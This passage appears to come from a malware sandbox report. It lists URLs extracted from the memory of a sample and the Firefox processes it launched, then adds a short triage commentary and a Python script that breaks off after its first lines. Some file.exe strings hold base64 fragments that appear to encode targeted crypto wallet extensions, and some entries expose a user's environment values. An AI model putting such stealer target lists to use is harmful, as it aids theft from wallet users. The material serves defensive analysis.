Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://market-trk.com/50/9411?campaign=FF-SOV03-CompareCredit-BoATravel
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://media.wired.com/photos/669ee1db82dcc6be43bb872a/191:100/w_1280
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://money.com/olympic-gold-medals-worth-value/?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true&authuser=0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4983000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://qz.com/travel-agent-millionaires-sienna-charles-jaclyn-india-1851600173?utm_source=pocket-ne
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s.zkcdn.net/Advertisers/3c46a6db92de457aac08d729b7e553ee.png
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3204250209.0000016DE9EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128160260.0000016DDE27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3163108384.0000016DE4B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.fastcompany.com/91161368/experts-say-the-gender-pay-gap-may-never-go-away?utm_source=poc
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000021.00000003.2958312592.0000016DDF977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2953642125.0000016DDF973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000003.2987016191.0000016DDF1FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chat_load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/load.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/open.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE077C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3211896336.0000016DEA82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O
Source: firefox.exe, 00000021.00000003.3202373857.0000016DECCDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210911621.0000016DEA8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/;report-uri
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/api/main.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/service/lazy.min.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/support/content/
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js
Source: firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hotels.com/?locale=en_US&pos=HCOM_US&siteid=300000001&rffrid=sem.hcom.US.AMP.003.00.03.s
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.jezebel.com/have-the-olympic-beds-always-been-this-bad?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.latimes.com/sports/olympics/story/2024-07-23/simone-biles-yurchenko-double-pick-paris?ut
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.motherjones.com/politics/2024/07/joe-biden-climate-legacy-donald-trump-kamala-harris/?ut
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.motherjones.com/wp-content/uploads/2024/07/202407-24-biden-harris.jpg?w=1200&h=630&crop=
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE9763000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE977C000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3121392395.0000016DE68C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: firefox.exe, 00000021.00000003.3204250209.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158429296.0000016DE9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212266661.0000016DE9EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/127.0/releasenotes/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, targeting.snapshot.json.tmp.33.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/0x1024
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2190665391.000000002EF4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nationalgeographic.com/animals/article/cocaine-sharks-brazil-pollution-contaminated-wate
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.outsideonline.com/food/food-culture/what-is-american-wagyu/?utm_source=pocket-newtab-en-
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.outsideonline.com/outdoor-adventure/olympics/salt-lake-city-hosts-2034-winter-olympics/?
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.romper.com/life/i-quit-cooking-family-mealtime-weeknight?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.runnersworld.com/gear/a60891571/can-your-garmin-watch-replace-a-coach/?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3163179964.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.themarshallproject.org/2024/07/25/police-mental-health-alternative-911?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.thetakeout.com/1622553/ice-cube-secret-ingredient-grilled-cheese/?utm_source=pocket-newt
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.thetakeout.com/img/gallery/hear-us-out-ice-cubes-are-the-secret-to-amping-up-grilled-che
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wired.com/story/amoc-collapse-atlantic-ocean/?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212471692.0000016DE97D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account9
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCS
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www.
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n
Source: firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2887374046.0000016DDF0C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000021.00000003.2970407421.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2883300923.0000016DDF2C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
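The string list above mixes two very different kinds of source: strings dumped from file.exe's own memory and strings from the firefox.exe processes that ran in the same analysis, most of which are ordinary browser new-tab and Pocket content. Two of the file.exe entries (the mozilla.org/privacy/firefox/ URLs with long base64-looking tails) deserve a second look: like the "0x1024" and "Firefox" suffixes on neighbouring entries, the tail is most likely adjacent memory that the string extractor glued onto the URL, and it decodes once the base64 symbol alignment is corrected. The script below is an added triage example, not part of the report: it separates records by source process, then tries the four possible alignments of each long tail and keeps the one that yields printable text. The three REPORT_LINES are copied from the list above; the 32-character a-p pattern used to spot Chromium extension IDs and the 16-character minimum tail length are my assumptions.

```python
import re
import string

# Three records copied from the report's "String found in binary or memory" list:
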